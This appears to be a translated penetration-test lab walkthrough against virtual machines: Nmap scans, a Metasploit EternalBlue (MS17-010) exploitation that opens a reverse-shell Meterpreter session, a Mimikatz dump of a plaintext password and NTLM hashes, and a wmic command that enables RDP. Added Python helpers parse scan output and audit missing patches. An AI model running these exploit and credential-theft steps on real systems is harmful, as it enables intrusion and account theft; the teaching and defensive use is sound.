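One thing to keep in mind when reading the "256 hosts up" line above: with -Pn, Nmap skips host discovery entirely and assumes every address is up, so that count carries no information. What does carry information is the port state: "open" means a SYN/ACK came back, "closed" means a RST came back (a reachable host with nothing listening on that port), and a host whose ports are all "filtered" never answered at all. The Python script below, added here as an example rather than code from the original post, parses Nmap's normal output into per-host records and sorts the hosts into those three buckets. The scan text it embeds is a constructed excerpt in the same layout as the output above, not a live capture.

```python
import re

# Constructed excerpt of `nmap -Pn` normal output, laid out like the scan above.
# The hosts and ports mirror the page's results; it is typed here, not captured.
SAMPLE_SCAN = """\
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-08 19:26 CST
Nmap scan report for 10.211.55.2
Host is up (0.0013s latency).
All 1000 scanned ports on 10.211.55.2 are closed
Nmap scan report for 10.211.55.3
Host is up (0.000022s latency).
All 1000 scanned ports on 10.211.55.3 are filtered
Nmap scan report for windows-10.shared (10.211.55.5)
Host is up (0.00068s latency).
Not shown: 997 filtered ports
PORT    STATE SERVICE
135/tcp open  msrpc
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
Nmap scan report for ubuntu-linux20.04.shared (10.211.55.6)
Host is up (0.00085s latency).
Not shown: 998 filtered ports
PORT     STATE SERVICE
22/tcp   open  ssh
8088/tcp open  radan-http
Nmap scan report for 10.211.55.7
Host is up (0.000018s latency).
All 1000 scanned ports on 10.211.55.7 are filtered
Nmap done: 5 IP addresses (5 hosts up) scanned in 12.34 seconds
"""

# One regex per line type in Nmap's normal output.
REPORT_RE = re.compile(
    r"^Nmap scan report for (?:(?P<name>\S+) \()?(?P<ip>\d+\.\d+\.\d+\.\d+)\)?$")
ALL_RE = re.compile(r"^All \d+ scanned ports on \S+ are (?P<state>\w+)")
NOTSHOWN_RE = re.compile(r"^Not shown: \d+ (?P<state>\w+) ports")
PORT_RE = re.compile(
    r"^(?P<port>\d+)/(?P<proto>tcp|udp)\s+(?P<state>\S+)\s+(?P<service>\S+)")


def parse_nmap_hosts(text):
    """Parse Nmap normal output into {ip: {"name", "open", "states"}}.

    "states" collects every port state seen for the host: the "All ... are X"
    and "Not shown: N X ports" summary lines contribute X, and each port-table
    row contributes its own state column.
    """
    hosts = {}
    current = None
    for line in text.splitlines():
        m = REPORT_RE.match(line)
        if m:
            current = {"name": m.group("name"), "open": [], "states": set()}
            hosts[m.group("ip")] = current
            continue
        if current is None:
            continue  # banner lines before the first host report
        m = ALL_RE.match(line) or NOTSHOWN_RE.match(line)
        if m:
            current["states"].add(m.group("state"))
            continue
        m = PORT_RE.match(line)
        if m:
            current["states"].add(m.group("state"))
            if m.group("state") == "open":
                current["open"].append(int(m.group("port")))
    return hosts


def classify_hosts(hosts):
    """Bucket hosts by what their port replies prove about reachability.

    Under -Pn the "Host is up" line is an assumption, so only port replies
    count: any open port, or any closed (RST-answered) port, proves a host is
    there; all-filtered means silence, indistinguishable from an empty address.
    """
    buckets = {"open_ports": [], "responds_no_open": [], "no_response": []}
    by_address = sorted(hosts.items(),
                        key=lambda kv: [int(o) for o in kv[0].split(".")])
    for ip, h in by_address:
        if h["open"]:
            buckets["open_ports"].append(ip)
        elif "closed" in h["states"]:
            buckets["responds_no_open"].append(ip)
        else:
            buckets["no_response"].append(ip)
    return buckets


if __name__ == "__main__":
    for bucket, ips in classify_hosts(parse_nmap_hosts(SAMPLE_SCAN)).items():
        print(f"{bucket:18s} {', '.join(ips) or '-'}")
```

Applied to the full scan above, the "responds but nothing open" bucket would contain 10.211.55.2 (all 1000 ports closed), which the narrative does not count among its three live hosts; whether such a host is in scope is a judgment call, but it belongs in the notes rather than in the silent bucket.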

The probe shows that this IP range has 3 live hosts.

They are: 10.211.55.5, 10.211.55.6 and 10.211.55.8

Run a full port scan against these three hosts to see which ports each of them has open.


10.211.55.5

```text
(base) ➜ ~ sudo nmap -sS -p 1-65535 -v 10.211.55.5
Password:
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-08 19:37 CST
Initiating ARP Ping Scan at 19:37
Scanning 10.211.55.5 [1 port]
Completed ARP Ping Scan at 19:37, 0.00s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 19:37
Scanning windows-10.shared (10.211.55.5) [65535 ports]
Discovered open port 135/tcp on 10.211.55.5
Discovered open port 139/tcp on 10.211.55.5
Discovered open port 445/tcp on 10.211.55.5
Discovered open port 49664/tcp on 10.211.55.5
Discovered open port 49669/tcp on 10.211.55.5
Discovered open port 5040/tcp on 10.211.55.5
Discovered open port 49667/tcp on 10.211.55.5
Discovered open port 49668/tcp on 10.211.55.5
Discovered open port 49665/tcp on 10.211.55.5
Discovered open port 49671/tcp on 10.211.55.5
Discovered open port 49666/tcp on 10.211.55.5
Completed SYN Stealth Scan at 19:37, 41.72s elapsed (65535 total ports)
Nmap scan report for windows-10.shared (10.211.55.5)
Host is up (0.00018s latency).
Not shown: 65524 closed ports
PORT      STATE SERVICE
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
5040/tcp  open  unknown
49664/tcp open  unknown
49665/tcp open  unknown
49666/tcp open  unknown
49667/tcp open  unknown
49668/tcp open  unknown
49669/tcp open  unknown
49671/tcp open  unknown
MAC Address: 00:1C:42:F4:4F:FE (Parallels)

Read data files from: /usr/local/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 41.79 seconds
           Raw packets sent: 69291 (3.049MB) | Rcvd: 65536 (2.621MB)
```

The set of open ports indicates that this host runs Windows; next, identify the operating system version.

(base) ➜ ~ sudo nmap -O 10.211.55.5
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-08 19:40 CST
Nmap scan report for windows-10.shared (10.211.55.5)
Host is up (0.00022s latency).
Not shown: 997 closed ports
PORT    STATE SERVICE
135/tcp open  msrpc
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
MAC Address: 00:1C:42:F4:4F:FE (Parallels)
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows Longhorn|10|2008|7|Vista|8.1 (94%)
OS CPE: cpe:/o:microsoft:windows cpe:/o:microsoft:windows_10:1703 cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_7::sp1 cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows_vista::sp1 cpe:/o:microsoft:windows_8.1
Aggressive OS guesses: Microsoft Windows Longhorn (94%), Microsoft Windows 10 1703 (92%), Microsoft Windows 10 1511 (91%), Microsoft Windows Server 2008 R2 (91%), Microsoft Windows Server 2008 SP2 (91%), Microsoft Windows 7 SP1 (91%), Microsoft Windows 8.1 Update 1 (91%), Microsoft Windows 8 (91%), Microsoft Windows 10 1607 (91%), Microsoft Windows Vista SP1 (90%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop

OS detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 5.43 seconds

10.211.55.6

Port scan

(base) ➜ ~ sudo nmap -sS -p 1-65535 -v 10.211.55.6
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-08 19:41 CST
Initiating ARP Ping Scan at 19:41
Scanning 10.211.55.6 [1 port]
Completed ARP Ping Scan at 19:41, 0.00s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 19:41
Scanning ubuntu-linux20.04.shared (10.211.55.6) [65535 ports]
Discovered open port 22/tcp on 10.211.55.6
Discovered open port 61616/tcp on 10.211.55.6
Discovered open port 8161/tcp on 10.211.55.6
Discovered open port 8088/tcp on 10.211.55.6
Completed SYN Stealth Scan at 19:41, 0.55s elapsed (65535 total ports)
Nmap scan report for ubuntu-linux20.04.shared (10.211.55.6)
Host is up (0.000046s latency).
Not shown: 65531 closed ports
PORT      STATE SERVICE
22/tcp    open  ssh
8088/tcp  open  radan-http
8161/tcp  open  patrol-snmp
61616/tcp open  unknown
MAC Address: 00:1C:42:B7:60:2B (Parallels)

Read data files from: /usr/local/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.61 seconds
           Raw packets sent: 65536 (2.884MB) | Rcvd: 65536 (2.621MB)

Operating system identification

(base) ➜ ~ sudo nmap -O 10.211.55.6
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-08 19:42 CST
Nmap scan report for ubuntu-linux20.04.shared (10.211.55.6)
Host is up (0.00019s latency).
Not shown: 998 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
8088/tcp open  radan-http
MAC Address: 00:1C:42:B7:60:2B (Parallels)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=8/8%OT=22%CT=1%CU=37942%PV=Y%DS=1%DC=D%G=Y%M=001C42%TM
OS:=5F2E8FA2%P=x86_64-apple-darwin19.0.0)SEQ(SP=101%GCD=1%ISR=10D%TI=Z%CI=Z
OS:%II=I%TS=A)OPS(O1=M5B4ST11NW7%O2=M5B4ST11NW7%O3=M5B4NNT11NW7%O4=M5B4ST11
OS:NW7%O5=M5B4ST11NW7%O6=M5B4ST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE
OS:88%W6=FE88)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M5B4NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=4
OS:0%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O
OS:=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40
OS:%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q
OS:=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y
OS:%DFI=N%T=40%CD=S)

Network Distance: 1 hop

OS detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.23 seconds

10.211.55.8

Port scan

(base) ➜ ~ sudo nmap -sS -p 1-65535 -v 10.211.55.8
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-08 19:43 CST
Initiating ARP Ping Scan at 19:43
Scanning 10.211.55.8 [1 port]
Completed ARP Ping Scan at 19:43, 0.00s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 19:43
Scanning windows-7sp1.shared (10.211.55.8) [65535 ports]
Discovered open port 445/tcp on 10.211.55.8
Discovered open port 135/tcp on 10.211.55.8
Discovered open port 139/tcp on 10.211.55.8
Discovered open port 49157/tcp on 10.211.55.8
Discovered open port 49156/tcp on 10.211.55.8
Discovered open port 49153/tcp on 10.211.55.8
Discovered open port 49155/tcp on 10.211.55.8
Discovered open port 49154/tcp on 10.211.55.8
Discovered open port 49152/tcp on 10.211.55.8
Completed SYN Stealth Scan at 19:44, 40.56s elapsed (65535 total ports)
Nmap scan report for windows-7sp1.shared (10.211.55.8)
Host is up (0.00010s latency).
Not shown: 65526 closed ports
PORT      STATE SERVICE
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
49152/tcp open  unknown
49153/tcp open  unknown
49154/tcp open  unknown
49155/tcp open  unknown
49156/tcp open  unknown
49157/tcp open  unknown
MAC Address: 00:1C:42:B2:9C:23 (Parallels)

Read data files from: /usr/local/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 40.63 seconds
           Raw packets sent: 69424 (3.055MB) | Rcvd: 65537 (2.622MB)

Operating system identification

sudo nmap -O 10.211.55.8
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-08 19:44 CST
Nmap scan report for windows-7sp1.shared (10.211.55.8)
Host is up (0.00017s latency).
Not shown: 991 closed ports
PORT      STATE SERVICE
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
49152/tcp open  unknown
49153/tcp open  unknown
49154/tcp open  unknown
49155/tcp open  unknown
49156/tcp open  unknown
49157/tcp open  unknown
MAC Address: 00:1C:42:B2:9C:23 (Parallels)
Device type: general purpose
Running: Microsoft Windows 7|2008|8.1
OS CPE: cpe:/o:microsoft:windows_7::- cpe:/o:microsoft:windows_7::sp1 cpe:/o:microsoft:windows_server_2008::sp1 cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows_8.1
OS details: Microsoft Windows 7 SP0 - SP1, Windows Server 2008 SP1, Windows Server 2008 R2, Windows 8, or Windows 8.1 Update 1
Network Distance: 1 hop

OS detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 2.78 seconds

Goby

Because Goby's packet rate is set to the maximum, running it drops the network connection and disrupts other network use, so it is not demonstrated here; it is only listed as an indicative step.

Collecting information about the client company

Qichacha (企查查)

www.qichacha.com

Corporate portal website

In this scenario, assume we have collected the client company's e-mail addresses.

Vulnerability exploitation

From the information gathered so far, we can draw the following conclusions.

10.211.55.5 and 10.211.55.8 both run Windows.

The Windows hosts have the following ports open:

10.211.55.5
PORT      STATE SERVICE
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
5040/tcp  open  unknown
49664/tcp open  unknown
49665/tcp open  unknown
49666/tcp open  unknown
49667/tcp open  unknown
49668/tcp open  unknown
49669/tcp open  unknown
49671/tcp open  unknown

10.211.55.8
PORT      STATE SERVICE
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
49152/tcp open  unknown
49153/tcp open  unknown
49154/tcp open  unknown
49155/tcp open  unknown
49156/tcp open  unknown
49157/tcp open  unknown

During a penetration test, one shell session should do only one kind of work: do not reuse the port-scanning shell for vulnerability checking and exploitation. This makes it easy to export each log as text and hand it to the client.

Based on the open port 445, we can preliminarily assess that the MS17-010 (EternalBlue) vulnerability may be present.

Verify the vulnerability and then exploit it, using Metasploit's check before running the payload.


Verification shows that 10.211.55.5 is not vulnerable to MS17-010.



Verification shows that 10.211.55.8 is vulnerable to MS17-010, so the exploit is run against it.

msf5 exploit(windows/smb/ms17_010_eternalblue) > set rhosts 10.211.55.8
rhosts => 10.211.55.8
msf5 exploit(windows/smb/ms17_010_eternalblue) > set rport 445
rport => 445
msf5 exploit(windows/smb/ms17_010_eternalblue) > run

[*] Started reverse TCP handler on 192.168.1.2:4444 
[*] 10.211.55.8:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 10.211.55.8:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit)
[*] 10.211.55.8:445 - Scanned 1 of 1 hosts (100% complete)
[*] 10.211.55.8:445 - Connecting to target for exploitation.
[+] 10.211.55.8:445 - Connection established for exploitation.
[+] 10.211.55.8:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.211.55.8:445 - CORE raw buffer dump (38 bytes)
[*] 10.211.55.8:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 55 6c 74 69 6d 61  Windows 7 Ultima
[*] 10.211.55.8:445 - 0x00000010  74 65 20 37 36 30 31 20 53 65 72 76 69 63 65 20  te 7601 Service 
[*] 10.211.55.8:445 - 0x00000020  50 61 63 6b 20 31                                Pack 1          
[+] 10.211.55.8:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.211.55.8:445 - Trying exploit with 12 Groom Allocations.
[*] 10.211.55.8:445 - Sending all but last fragment of exploit packet
[*] 10.211.55.8:445 - Starting non-paged pool grooming
[+] 10.211.55.8:445 - Sending SMBv2 buffers
[+] 10.211.55.8:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 10.211.55.8:445 - Sending final SMBv2 buffers.
[*] 10.211.55.8:445 - Sending last fragment of exploit packet!
[*] 10.211.55.8:445 - Receiving response from exploit packet
[+] 10.211.55.8:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 10.211.55.8:445 - Sending egg to corrupted connection.
[*] 10.211.55.8:445 - Triggering free of corrupted buffer.
[*] Sending stage (201283 bytes) to 192.168.1.2
[*] Meterpreter session 1 opened (192.168.1.2:4444 -> 192.168.1.2:49249) at 2020-08-08 20:00:18 +0800
[+] 10.211.55.8:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.211.55.8:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.211.55.8:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

meterpreter >


Capture the account login credentials of the target host:

C:\Windows\system32>ipconfig
ipconfig

Windows IP Configuration


Ethernet adapter ???????? 2:

   Connection-specific DNS Suffix  . : localdomain
   IPv6 Address. . . . . . . . . . . : fdb2:2c26:f4e4:0:7002:eaf9:c043:7b1b
   Temporary IPv6 Address. . . . . . : fdb2:2c26:f4e4:0:cde9:7d52:8c02:9037
   Link-local IPv6 Address . . . . . : fe80::7002:eaf9:c043:7b1b%14
   IPv4 Address. . . . . . . . . . . : 10.211.55.8
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : fe80::21c:42ff:fe00:18%14
                                       10.211.55.1

Tunnel adapter isatap.localdomain:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . : localdomain

C:\Windows\system32>systeminfo
systeminfo

Host Name:                 RETURN0FA54
OS Name:                   Microsoft Windows 7 Ultimate 
OS Version:                6.1.7601 Service Pack 1 Build 7601
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Workstation
OS Build Type:             Multiprocessor Free
Registered Owner:          return0;
Registered Organization:   
Product ID:                00426-384-1216344-06000
Original Install Date:     2020/7/13, 1:45:07
System Boot Time:          2020/8/8, 14:45:29
System Manufacturer:       Parallels Software International Inc.
System Model:              Parallels Virtual Platform
System Type:               x64-based PC
Processor(s):              1 Processor(s) Installed.
                           [01]: Intel64 Family 6 Model 158 Stepping 13 GenuineIntel ~2400 Mhz
BIOS Version:              Parallels Software International Inc. 15.1.4 (47270), 2020/4/13
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             zh-cn;Chinese (China)
Input Locale:              en-us;English (United States)
Time Zone:                 N/A
Total Physical Memory:     4,096 MB
Available Physical Memory: 3,313 MB
Virtual Memory: Max Size:  8,189 MB
Virtual Memory: Available: 7,308 MB
Virtual Memory: In Use:    881 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    WORKGROUP
Logon Server:              N/A
Hotfix(s):                 2 Hotfix(s) Installed.
                           [01]: KB2534111
                           [02]: KB976902
Network Card(s):           1 NIC(s) Installed.
                           [01]: Parallels Ethernet Adapter
                                 Connection Name: 本地鏈接 2
                                 DHCP Enabled:    Yes
                                 DHCP Server:     10.211.55.1
                                 IP address(es)
                                 [01]: 10.211.55.8
                                 [02]: fe80::7002:eaf9:c043:7b1b
                                 [03]: fdb2:2c26:f4e4:0:cde9:7d52:8c02:9037
                                 [04]: fdb2:2c26:f4e4:0:7002:eaf9:c043:7b1b


Information gathering on the target shows a 64-bit system, so the 64-bit mimikatz.exe is uploaded to dump passwords.

mimikatz # sekurlsa::logonPasswords

Authentication Id : 0 ; 73647 (00000000:00011faf)
Session           : Interactive from 1
User Name         : return0
Domain            : RETURN0FA54
Logon Server      : RETURN0FA54
Logon Time        : 2020/8/8 14:45:41
SID               : S-1-5-21-2676871807-2807053931-1165176819-1000
        msv :
         [00000003] Primary
         * Username   : return0
         * Domain     : RETURN0FA54
         * LM         : b47f9a39939fbe2e3cfeb463bfee415c
         * NTLM       : 52dec73c7fb089d8917fbdf7985b6036
         * SHA1       : f072ae3248a49934bd3d472cdf8ffcaffa74f7bf
        tspkg :
         * Username   : return0
         * Domain     : RETURN0FA54
         * Password   : woshidashabi!
        wdigest :
         * Username   : return0
         * Domain     : RETURN0FA54
         * Password   : woshidashabi!
        kerberos :
         * Username   : return0
         * Domain     : RETURN0FA54
         * Password   : woshidashabi!
        ssp :
        credman :

Authentication Id : 0 ; 73594 (00000000:00011f7a)
Session           : Interactive from 1
User Name         : return0
Domain            : RETURN0FA54
Logon Server      : RETURN0FA54
Logon Time        : 2020/8/8 14:45:41
SID               : S-1-5-21-2676871807-2807053931-1165176819-1000
        msv :
         [00000003] Primary
         * Username   : return0
         * Domain     : RETURN0FA54
         * LM         : b47f9a39939fbe2e3cfeb463bfee415c
         * NTLM       : 52dec73c7fb089d8917fbdf7985b6036
         * SHA1       : f072ae3248a49934bd3d472cdf8ffcaffa74f7bf
        tspkg :
         * Username   : return0
         * Domain     : RETURN0FA54
         * Password   : woshidashabi!
        wdigest :
         * Username   : return0
         * Domain     : RETURN0FA54
         * Password   : woshidashabi!
        kerberos :
         * Username   : return0
         * Domain     : RETURN0FA54
         * Password   : woshidashabi!
        ssp :
        credman :

Authentication Id : 0 ; 997 (00000000:000003e5)
Session           : Service from 0
User Name         : LOCAL SERVICE
Domain            : NT AUTHORITY
Logon Server      : (null)
Logon Time        : 2020/8/8 14:45:40
SID               : S-1-5-19
        msv :
        tspkg :
        wdigest :
         * Username   : (null)
         * Domain     : (null)
         * Password   : (null)
        kerberos :
         * Username   : (null)
         * Domain     : (null)
         * Password   : (null)
        ssp :
        credman :

Authentication Id : 0 ; 996 (00000000:000003e4)
Session           : Service from 0
User Name         : RETURN0FA54$
Domain            : WORKGROUP
Logon Server      : (null)
Logon Time        : 2020/8/8 14:45:40
SID               : S-1-5-20
        msv :
        tspkg :
        wdigest :
         * Username   : RETURN0FA54$
         * Domain     : WORKGROUP
         * Password   : (null)
        kerberos :
         * Username   : return0fa54$
         * Domain     : WORKGROUP
         * Password   : (null)
        ssp :
        credman :

Authentication Id : 0 ; 30280 (00000000:00007648)
Session           : UndefinedLogonType from 0
User Name         : (null)
Domain            : (null)
Logon Server      : (null)
Logon Time        : 2020/8/8 14:45:39
SID               : 
        msv :
        tspkg :
        wdigest :
        kerberos :
        ssp :
        credman :

Authentication Id : 0 ; 999 (00000000:000003e7)
Session           : UndefinedLogonType from 0
User Name         : RETURN0FA54$
Domain            : WORKGROUP
Logon Server      : (null)
Logon Time        : 2020/8/8 14:45:39
SID               : S-1-5-18
        msv :
        tspkg :
        wdigest :
         * Username   : RETURN0FA54$
         * Domain     : WORKGROUP
         * Password   : (null)
        kerberos :
         * Username   : return0fa54$
         * Domain     : WORKGROUP
         * Password   : (null)
        ssp :
        credman :
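Two things in the output above explain why this host fell: the systeminfo dump lists only two hotfixes, none of them the March 2017 update that closed MS17-010, and WDigest still hands mimikatz a plaintext password. As an added example (not from the original post), the following Python parses a saved systeminfo dump and reports which expected updates are absent. The KB numbers are an assumption scoped to Windows 7 SP1 / Server 2008 R2: KB4012212 (security-only) and KB4012215 (monthly rollup) carry the MS17-010 fix, and KB2871997 is the update that lets WDigest stop caching plaintext credentials once the UseLogonCredential registry value is set to 0. The systeminfo text is a constructed sample mirroring the relevant lines of the post's output.

```python
"""Patch-level triage from a saved `systeminfo` dump (added example, not from the post).

Parses the OS line and the hotfix list and reports which expected updates are
absent. Later cumulative rollups supersede the MS17-010 packages, so a miss
here means "review this host", not "proven unpatched".
"""
import re
from typing import Dict, List, NamedTuple, Set

# Assumption: KB numbers for Windows 7 SP1 / Server 2008 R2 only.
# KB4012212 (security-only) and KB4012215 (monthly rollup) both fix MS17-010.
# KB2871997 lets WDigest stop caching plaintext passwords once
# HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest\UseLogonCredential = 0.
EXPECTED_KBS: Dict[str, Set[str]] = {
    "MS17-010 (KB4012212 or KB4012215)": {"KB4012212", "KB4012215"},
    "WDigest credential caching (KB2871997)": {"KB2871997"},
}

class SysInfo(NamedTuple):
    os_name: str
    os_version: str
    hotfixes: Set[str]

def parse_systeminfo(text: str) -> SysInfo:
    """Pull the fields this check needs out of systeminfo's 'key: value' layout."""
    os_name = os_version = ""
    for line in text.splitlines():
        key, _, value = line.partition(":")
        if key.strip() == "OS Name":
            os_name = value.strip()
        elif key.strip() == "OS Version":
            os_version = value.strip()
    # Hotfixes appear as "[01]: KB2534111" lines under "Hotfix(s):".
    return SysInfo(os_name, os_version, set(re.findall(r"\bKB\d{6,7}\b", text)))

def audit(text: str) -> Dict[str, object]:
    """Report the OS, whether the KB table applies (NT 6.1 = Windows 7 / 2008 R2),
    and the expected update groups with no installed member."""
    info = parse_systeminfo(text)
    applies = info.os_version.startswith("6.1")
    missing: List[str] = []
    if applies:
        missing = [name for name, kbs in EXPECTED_KBS.items()
                   if not kbs & info.hotfixes]
    return {"os": info.os_name, "applies": applies, "missing": missing}

# Constructed sample mirroring the relevant lines of the post's systeminfo output.
UNPATCHED = """\
Host Name:                 RETURN0FA54
OS Name:                   Microsoft Windows 7 Ultimate
OS Version:                6.1.7601 Service Pack 1 Build 7601
System Type:               x64-based PC
Hotfix(s):                 2 Hotfix(s) Installed.
                           [01]: KB2534111
                           [02]: KB976902
"""
# Constructed sample of the same host after the two updates are installed.
PATCHED = UNPATCHED.replace("2 Hotfix(s) Installed.", "4 Hotfix(s) Installed.") + \
    "                           [03]: KB2871997\n" \
    "                           [04]: KB4012215\n"

if __name__ == "__main__":
    for label, dump in (("unpatched", UNPATCHED), ("patched", PATCHED)):
        print(label, audit(dump))
```

Run against the unpatched dump it flags both groups; against the patched dump it reports nothing missing. Note that installing KB2871997 alone is not enough on Windows 7: the UseLogonCredential value must also be set to 0, and LSASS still holds the NTLM hash, which is why the msv block above would remain useful to an attacker even after WDigest is fixed.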


The earlier information gathering found port 3389 closed, so remote desktop login is not possible; the following command is used to enable port 3389.

wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1

Probing the ports again with Nmap shows that port 3389 has been opened successfully.

(base) ➜ ~ sudo nmap -O 10.211.55.8
Password:
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-08 20:13 CST
Nmap scan report for windows-7sp1.shared (10.211.55.8)
Host is up (0.00018s latency).
Not shown: 990 closed ports
PORT      STATE SERVICE
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
3389/tcp  open  ms-wbt-server
49152/tcp open  unknown
49153/tcp open  unknown
49154/tcp open  unknown
49155/tcp open  unknown
49156/tcp open  unknown
49157/tcp open  unknown
MAC Address: 00:1C:42:B2:9C:23 (Parallels)
Device type: general purpose
Running: Microsoft Windows 7|2008|8.1
OS CPE: cpe:/o:microsoft:windows_7::- cpe:/o:microsoft:windows_7::sp1 cpe:/o:microsoft:windows_server_2008::sp1 cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows_8.1
OS details: Microsoft Windows 7 SP0 - SP1, Windows Server 2008 SP1, Windows Server 2008 R2, Windows 8, or Windows 8.1 Update 1
Network Distance: 1 hop

OS detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 2.91 seconds
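Reading Nmap output by eye is how the three live hosts were picked out of the sweep at the start of this post, and how the new 3389/tcp listener was spotted in the rescan above. As an added example (not part of the original post), the following Python parses Nmap's normal output into a host-to-ports map, lists only hosts with at least one open port, and diffs two scans of the same host so that a newly opened port such as 3389/tcp stands out. The "open port" filter matters because the sweep was run with -Pn: Nmap then reports every one of the 256 addresses as "up", and only the port table separates real hosts from filtered addresses. The sample outputs are constructed to mirror the excerpts in this post.

```python
"""Triage helper for Nmap normal-format output (added example, not from the post).

Handles the two report shapes seen in this write-up: hosts whose ports are all
filtered/closed (no port table) and hosts with a PORT/STATE/SERVICE table.
"""
import re
from typing import Dict, List

HOST_RE = re.compile(r"^Nmap scan report for (?:\S+ \()?(\d+\.\d+\.\d+\.\d+)\)?$")
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)")

def parse_nmap(text: str) -> Dict[str, Dict[str, str]]:
    """Map each scanned IP to {"port/proto": state}; hosts with no port table map to {}."""
    hosts: Dict[str, Dict[str, str]] = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        m = HOST_RE.match(line)
        if m:
            current = m.group(1)
            hosts[current] = {}
            continue
        m = PORT_RE.match(line)
        if m and current is not None:
            hosts[current][f"{m.group(1)}/{m.group(2)}"] = m.group(3)
    return hosts

def _ip_key(ip: str):
    return tuple(int(octet) for octet in ip.split("."))

def hosts_with_open_ports(text: str) -> List[str]:
    """IPs with at least one open port, numerically sorted. With -Pn this is the
    real liveness signal, because Nmap marks every address as up."""
    return sorted((ip for ip, ports in parse_nmap(text).items()
                   if "open" in ports.values()), key=_ip_key)

def new_open_ports(before: str, after: str) -> Dict[str, List[str]]:
    """Ports open in `after` that were not open in `before`, per host."""
    old, new = parse_nmap(before), parse_nmap(after)
    diff: Dict[str, List[str]] = {}
    for ip, ports in new.items():
        opened = [p for p, state in ports.items()
                  if state == "open" and old.get(ip, {}).get(p) != "open"]
        if opened:
            diff[ip] = sorted(opened, key=lambda p: int(p.split("/")[0]))
    return diff

# Constructed sample: the -Pn sweep, trimmed to a few addresses, laid out as Nmap prints it.
SWEEP = """\
Nmap scan report for 10.211.55.2
Host is up (0.0013s latency).
All 1000 scanned ports on 10.211.55.2 are closed

Nmap scan report for windows-10.shared (10.211.55.5)
Host is up (0.00068s latency).
Not shown: 997 filtered ports
PORT    STATE SERVICE
135/tcp open  msrpc
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds

Nmap scan report for ubuntu-linux20.04.shared (10.211.55.6)
Host is up (0.00085s latency).
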